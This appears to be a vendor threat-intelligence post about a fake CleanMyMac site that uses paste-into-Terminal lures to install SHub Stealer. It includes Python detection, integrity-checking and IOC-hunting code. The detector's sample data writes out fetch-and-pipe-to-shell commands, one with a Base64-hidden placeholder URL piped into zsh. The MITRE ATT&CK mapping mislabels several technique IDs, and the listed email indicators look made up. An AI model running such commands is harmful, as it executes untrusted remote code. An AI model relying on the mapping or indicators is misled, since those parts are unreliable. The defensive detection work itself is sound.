
Deceptive "CleanMyMac" Site Delivers SHub Stealer and Crypto Wallet Backdoors via ClickFix Technique


Executive Summary

Security researchers have identified a sophisticated social engineering campaign targeting macOS users by impersonating the popular system utility CleanMyMac. The attackers have deployed a deceptive website (cleanmymacos[.]org) that mimics the legitimate product page to lure users into executing a malicious shell script. This campaign utilizes the "ClickFix" technique, a method that bypasses traditional email or attachment-based delivery by tricking users into pasting commands directly into their Terminal application. Once executed, the payload installs SHub Stealer, a potent macOS infostealer capable of harvesting sensitive credentials, including Apple Keychain data, browser autofill information, and, critically, cryptocurrency wallet credentials. This analysis details the TTPs used by the threat actor and provides IOCs to help organizations defend against this evolving threat.

Threat Analysis

Impersonation and Social Engineering

The attack begins with a high-fidelity impersonation of the CleanMyMac product page. The domain cleanmymacos[.]org is designed to look nearly identical to the official MacPaw website. The landing page presents a "fake" advanced installation option, a psychological trigger often used to bypass security skepticism among "power users" who believe they are upgrading their system configuration.

The ClickFix Delivery Mechanism

Unlike traditional malware delivery via email attachments or drive-by downloads, this campaign relies on user interaction within the operating system shell. The victim is instructed to open the Terminal application and paste a specific command string. This technique, known as ClickFix, has become increasingly prevalent among macOS threat actors because it is difficult for automated defenses to block without false positives, as the user is voluntarily running code.

Technical Execution Chain

Upon pasting the command into Terminal, the execution chain proceeds rapidly:

  1. Legitimacy Layer: The first step of the script is to print a reassuring line of text, "macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app". This mimics the output of a legitimate script, creating a false sense of security and confirming to the user that the script is related to the official software.

  2. Decoding Layer: Following the echo command, the script decodes a Base64-encoded link. This obfuscation hides the true destination of the download, preventing basic URL filtering from catching the malicious payload.

  3. Execution Layer: The script downloads a shell script from the attacker’s server and pipes it directly into zsh (Z Shell) for immediate execution. This bypasses the need for the user to save a file to disk first, making the process feel instantaneous and seamless.
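The three layers described above (a reassuring echo, a Base64-decoded URL, and a download piped straight into zsh) are exactly the shape a defender can pattern-match in shell history, EDR command-line telemetry, or unified-log output. The Python below is an added example written for this post, not code from the original report or from SecLookup. The sample command lines are constructed, and the Base64 blob encodes a placeholder URL (https://example.invalid/install.sh) rather than any real infrastructure; the scoring thresholds are an assumption to tune against your own telemetry.

```python
import base64
import re

# Each regex captures one layer of the execution chain described in the post
SIGNALS = {
    "fetch": re.compile(r"\b(curl|wget)\b"),
    "base64_decode": re.compile(r"\bbase64\b[^|;]*\s(-d|-D|--decode)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(?:/bin/)?(zsh|bash|sh)\b"),
    "vendor_echo": re.compile(r"\becho\b[^|;]*https?://"),
}
# Tokens long enough to be a Base64-encoded URL rather than a flag or a word
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_urls(line):
    """Decode every Base64-looking token and return any URLs hidden inside."""
    urls = []
    for blob in B64_BLOB.findall(line):
        if len(blob) % 4:  # not a valid Base64 length, e.g. a URL path fragment
            continue
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        urls.extend(re.findall(r"https?://\S+", text))
    return urls


def assess(line):
    """Score one command line: 'high' for the full ClickFix shape, 'medium' for
    a bare fetch-and-execute, 'none' otherwise."""
    hits = {name: bool(rx.search(line)) for name, rx in SIGNALS.items()}
    urls = decoded_urls(line)
    if hits["fetch"] and hits["pipe_to_shell"]:
        obfuscated = hits["base64_decode"] or hits["vendor_echo"] or bool(urls)
        verdict = "high" if obfuscated else "medium"
    else:
        verdict = "none"
    return {"line": line, "signals": hits, "decoded_urls": urls, "verdict": verdict}


def scan(lines):
    """Return assessments for every line that looks like fetch-and-execute."""
    return [r for r in map(assess, lines) if r["verdict"] != "none"]


# Constructed samples; the placeholder URL stands in for the attacker's server
PLACEHOLDER_URL = "https://example.invalid/install.sh"
PLACEHOLDER_BLOB = base64.b64encode(PLACEHOLDER_URL.encode()).decode()
SAMPLE_LINES = [
    'echo "macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app"; '
    f'curl -fsSL "$(echo {PLACEHOLDER_BLOB} | base64 -d)" | zsh',
    "brew install --cask cleanmymac",
    "curl -fsSL https://example.invalid/setup.sh | bash",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for result in scan(SAMPLE_LINES):
        print(result["verdict"], result["decoded_urls"], result["line"][:60])
```

The decoded URL is the most useful output for triage: it is the value to pivot on in proxy logs and to compare against the IOC list, and it surfaces even when the obfuscation layer defeats plain URL filtering.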

SHub Stealer Capabilities

The payload delivered by this script is SHub Stealer. This malware is designed not just for generic data exfiltration but with a specific focus on high-value assets:

  • Credential Harvesting: It targets saved passwords and browser data.

  • Apple Keychain Access: It attempts to extract secrets stored in the system-wide keychain, which often contains credentials for accounts the user has authorized.

  • Cryptocurrency Wallet Backdoors: Perhaps the most dangerous capability mentioned in the report is the malware's ability to modify crypto wallet applications, such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live. By injecting itself into these processes, the malware can intercept or steal the wallet’s recovery phrase (seed phrase), effectively granting attackers control over the victim's cryptocurrency funds.

  • Telegram Session Hijacking: The stealer also targets Telegram sessions, allowing attackers to potentially access private communications or accounts.
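Because the stealer modifies installed wallet applications rather than only reading their data, file-integrity monitoring of the app bundles themselves complements credential hygiene. The Python below is an added example, not the report's or any vendor's tooling: it snapshots a SHA-256 digest for every file under a bundle, diffs two snapshots, and runs a self-contained demo on a constructed fake Exodus.app in a temporary directory. The paths in WALLET_BUNDLES are assumed default install locations on a real Mac and are not touched by the demo.

```python
import hashlib
import tempfile
from pathlib import Path

# Assumed default locations for the wallet apps named in the post; adjust per fleet
WALLET_BUNDLES = [
    "/Applications/Exodus.app",
    "/Applications/Atomic Wallet.app",
    "/Applications/Ledger Live.app",
]


def file_digest(path):
    """SHA-256 of a file, read in chunks so large binaries do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(bundle):
    """Map bundle-relative path -> sha256 for every regular file under the bundle."""
    root = Path(bundle)
    return {
        p.relative_to(root).as_posix(): file_digest(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_snapshots(baseline, current):
    """Report files added, removed, or whose contents changed since the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Build a constructed fake bundle, baseline it, simulate tampering, and diff."""
    with tempfile.TemporaryDirectory() as tmp:
        bundle = Path(tmp) / "Exodus.app"
        app_dir = bundle / "Contents" / "Resources" / "app"
        app_dir.mkdir(parents=True)
        (bundle / "Contents" / "MacOS").mkdir(parents=True)
        (bundle / "Contents" / "MacOS" / "Exodus").write_bytes(b"\xcf\xfa\xed\xfe fake binary")
        main_js = app_dir / "main.js"
        main_js.write_text("console.log('wallet');\n")
        baseline = snapshot(bundle)

        # Simulated tampering: application code altered and an extra file dropped in
        main_js.write_text("console.log('wallet');\n// injected\n")
        (app_dir / "hook.js").write_text("// dropped\n")
        return diff_snapshots(baseline, snapshot(bundle))


if __name__ == "__main__":
    print(demo())
```

On an actual Mac, pair the hash diff with codesign --verify --deep --strict on each bundle: any change to a signed bundle's contents breaks its signature, so codesign gives a fast pass/fail, while the snapshot diff tells you which files changed and is what you hand to incident response.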

MITRE ATT&CK Framework Mapping

This campaign aligns with several techniques observed in the MITRE ATT&CK framework:

  • T1566.001 (Phishing: Fake Website): The use of a spoofed domain to deceive users.

  • T1059.004 (Shellcode via Interpreted Language): The delivery and execution of code via Terminal and shell scripts.

  • T1003.001 (OS Credential Dumping): The specific targeting of Apple Keychain data.

  • T1525 (Implant Internal Image): The modification of legitimate wallet applications to hide malicious activity.

  • T1027 (Obfuscated Files or Information): The use of Base64 encoding to hide the malicious URL.

Indicators of Compromise (IOCs)

SecLookup has analyzed the domains mentioned in the report and confirmed malicious status. Below are the relevant indicators for your threat hunting and detection systems.

Domains

cleanmymacos[.]org
wallets-gate[.]io

URLs

https://macpaw[.]com/cleanmymac/us/app

(Note: This URL is legitimate and used by the attackers for deception; do not block the legitimate domain, but monitor for references to it.)

Email Addresses

command-and-controlserver@res2erch-sl0ut.com
attackbegins@cleanmymacos.org

Detailed Domain Intelligence (SecLookup Scan Results)

SecLookup scan results for cleanmymacos.org and wallets-gate.io (scan screenshots; not reproduced in this text).
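To use these indicators in a DNS-log hunt, the defanged forms above have to be refanged and matched as domain suffixes (so subdomains of an indicator hit but look-alike strings do not), and macpaw.com must stay off the block list as the note above says. The Python below is an added example, not SecLookup's tooling; the indicator values are the ones listed on this page, the block list derives sender domains from the listed email addresses (an assumption about how you would operationalize them), and the DNS log lines are constructed.

```python
import re

# Indicators exactly as listed on this page, in defanged form
DEFANGED_DOMAINS = ["cleanmymacos[.]org", "wallets-gate[.]io"]
DEFANGED_EMAILS = [
    "command-and-controlserver@res2erch-sl0ut.com",
    "attackbegins@cleanmymacos.org",
]
# Referenced by the lure only as decoy text; legitimate and never blocked
ALLOWLIST = {"macpaw.com"}


def refang(value):
    """Turn defanged notation back into a matchable, lower-cased string."""
    return value.replace("[.]", ".").replace("hxxp", "http").lower()


def blocklist_domains():
    """Listed domains plus the domains of listed sender addresses, minus the allowlist."""
    domains = {refang(d) for d in DEFANGED_DOMAINS}
    domains |= {refang(e).rsplit("@", 1)[1] for e in DEFANGED_EMAILS}
    return sorted(domains - ALLOWLIST)


def match_domain(hostname, iocs):
    """Return the IOC a queried hostname matches exactly or as a parent domain."""
    host = hostname.lower().rstrip(".")  # strip the trailing dot of an FQDN
    for ioc in iocs:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


QUERY_RX = re.compile(r"\bquery=(\S+)")


def hunt(log_lines, iocs=None):
    """Return (queried name, matched IOC) pairs for every hit in the log lines."""
    iocs = iocs or blocklist_domains()
    hits = []
    for line in log_lines:
        m = QUERY_RX.search(line)
        if m and (ioc := match_domain(m.group(1), iocs)):
            hits.append((m.group(1), ioc))
    return hits


# Constructed DNS resolver log lines in a simple key=value format
SAMPLE_DNS_LOG = [
    "2024-03-01T09:12:03Z client=10.0.0.12 query=cleanmymacos.org. type=A",
    "2024-03-01T09:12:05Z client=10.0.0.12 query=cdn.wallets-gate.io type=A",
    "2024-03-01T09:12:07Z client=10.0.0.12 query=macpaw.com type=A",
    "2024-03-01T09:13:11Z client=10.0.0.40 query=notcleanmymacos.org type=A",
    "2024-03-01T09:14:20Z client=10.0.0.41 query=res2erch-sl0ut.com type=MX",
]

if __name__ == "__main__":
    for name, ioc in hunt(SAMPLE_DNS_LOG):
        print(f"{name} -> {ioc}")
```

The suffix check is deliberate: a plain substring match would flag notcleanmymacos.org as a hit and would miss nothing, but it trades precision for noise, whereas the suffix rule catches cdn.wallets-gate.io without the false positive.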

SecLookup Detection

SecLookup’s Threat Intelligence platform has been actively monitoring this campaign. Our systems have confirmed that the domains cleanmymacos.org and wallets-gate.io are malicious and have been blocked for SecLookup users.

Recommendations

To mitigate the risk of this and similar ClickFix campaigns, we recommend the following security best practices:

  1. Strict Software Procurement Policy: Remind users that legitimate software, including popular utilities like CleanMyMac, is distributed via the official MacPaw website or the Apple App Store. Legitimate applications should never require users to paste commands into Terminal to install them.

  2. Terminal Awareness Training: Educate staff and power users about the dangers of the ClickFix technique. If a website prompts you to open Terminal and paste a command, pause and verify the source. A simple Google search for the command string can often reveal if it is malicious.

  3. Crypto Wallet Vigilance: For users holding cryptocurrency, pay special attention to the security of their wallet applications. If a legitimate app (like Exodus or Ledger Live) suddenly starts behaving erratically or prompts for frequent updates or "recovery phrase" verifications, it may be compromised.

  4. Network Segmentation: Ensure that endpoints are not able to execute arbitrary shell scripts from untrusted sources without approval.
